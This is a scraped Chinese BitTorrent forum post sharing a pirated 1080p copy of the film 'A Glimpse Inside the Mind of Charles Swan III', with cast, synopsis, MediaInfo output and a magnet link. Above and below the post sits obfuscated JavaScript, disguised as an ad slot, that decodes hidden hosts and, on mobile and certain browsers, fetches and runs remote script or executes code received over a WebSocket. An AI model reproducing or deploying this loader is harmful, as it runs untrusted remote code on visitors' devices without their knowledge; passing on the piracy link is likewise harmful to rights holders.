查尔斯·斯旺三世心灵一瞥[中文字幕].A.Glimpse.Inside.III.2013.1080p.FriDay.WEB-DL.H264.AAC 3.01GB

版主小s 1月前 147

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 查尔斯·斯旺三世心灵一瞥 / 变脑漫游中(台) / 查尔斯天鹅三世的心灵 / 查尔斯的心灵 / 查尔斯的大脑

◎片 名 A Glimpse Inside the Mind of Charles Swan III

◎年 代 2012

◎产 地 美国

◎类 别 喜剧

◎语 言 英语

◎上映日期 2013-02-08(美国)

◎IMDb链接 https://www.imdb.com/title/tt2044729/

◎豆瓣评分 5.0/10 (111人评价)

◎豆瓣链接 https://movie.douban.com/subject/6819520/

◎片 长 86分钟

◎导 演 罗曼·科波拉 Roman Coppola (id:1045103)

◎编 剧 罗曼·科波拉 Roman Coppola (id:1045103)

◎演 员 玛丽·伊丽莎白·温斯特德 Mary Elizabeth Winstead (id:1041018)

查理·辛 Charlie Sheen (id:1049490)

比尔·默瑞 Bill Murray (id:1054508)

奥布瑞·普拉扎 Aubrey Plaza (id:1009271)

理查德·埃德森 Richard Edson (id:1343880)

法比娜·泰蕾兹 Fabianne Therese (id:1328304)

娜嘉拉·汤森德 Najarra Townsend (id:1036783)

斯蒂芬·多尔夫 Stephen Dorff (id:1025188)

◎标 签 美国 / 喜剧 / 2013 / 爱情 / 独立电影 / 罗曼·科波拉 / 查理辛 / 玛丽·伊丽莎白·温斯特德

◎简 介

影片的故事开始于1970年代,故事的主人翁是一个叫做查尔斯·斯万三世的男人。他是一个成功的美术设计师,也是一个很有女人缘的男人。

可是,最近,他却被自己的女朋友伊万娜给甩了,并且自己的生活也陷入了困顿和不快乐之中。他不知道自己是不是爱他或者是恨她,抑或只是想再见她一面。渐渐地,查尔斯在做恶梦、发热,并且总是会回忆起自己之前的过往和之前的往事。好在他还有自己的挚友科尔比以及经理人绍尔的陪同--只是,他这次能走出爱情的阴影并且重新把生活拉回正轨么?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 250743767556482414250257742437961998409 (0xBCA37E3740091C59EABEDCFDFAACA049)

  4. Complete name : A.Glimpse.Inside.the.M[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 3.01 GiB

  8. Duration : 1 h 25 min

  9. Overall bit rate : 5 044 kb/s

  10. Encoded date : UTC 2021-10-29 14:25:18

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 3 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 3 frames

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 1 h 25 min

  23. Bit rate : 4 916 kb/s

  24. Width : 1 920 pixels

  25. Height : 1 080 pixels

  26. Display aspect ratio : 16:9

  27. Frame rate mode : Constant

  28. Frame rate : 30.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 8 bits

  32. Scan type : Progressive

  33. Bits/(Pixel*Frame) : 0.079

  34. Stream size : 2.93 GiB (97%)

  35. Language : English

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. Format : AAC LC

  41. Format/Info : Advanced Audio Codec Low Complexity

  42. Codec ID : A_AAC-2

  43. Duration : 1 h 25 min

  44. Bit rate : 128 kb/s

  45. Channel(s) : 2 channels

  46. Channel layout : L R

  47. Sampling rate : 44.1 kHz

  48. Frame rate : 43.066 FPS (1024 SPF)

  49. Compression mode : Lossy

  50. Stream size : 78.2 MiB (3%)

  51. Title : English

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : UTF-8

  58. Codec ID : S_TEXT/UTF8

  59. Codec ID/Info : UTF-8 Plain Text

  60. Duration : 1 h 18 min

  61. Bit rate : 44 b/s

  62. Count of elements : 996

  63. Stream size : 25.4 KiB (0%)

  64. Title : Chinese Simplified

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : UTF-8

  71. Codec ID : S_TEXT/UTF8

  72. Codec ID/Info : UTF-8 Plain Text

  73. Duration : 1 h 18 min

  74. Bit rate : 44 b/s

  75. Count of elements : 996

  76. Stream size : 25.4 KiB (0%)

  77. Title : Chinese Traditional

  78. Language : Chinese

  79. Default : No

  80. Forced : No




复制代码


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:F691B4825D52DE0F320E89982A4658D54DD36EE5

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};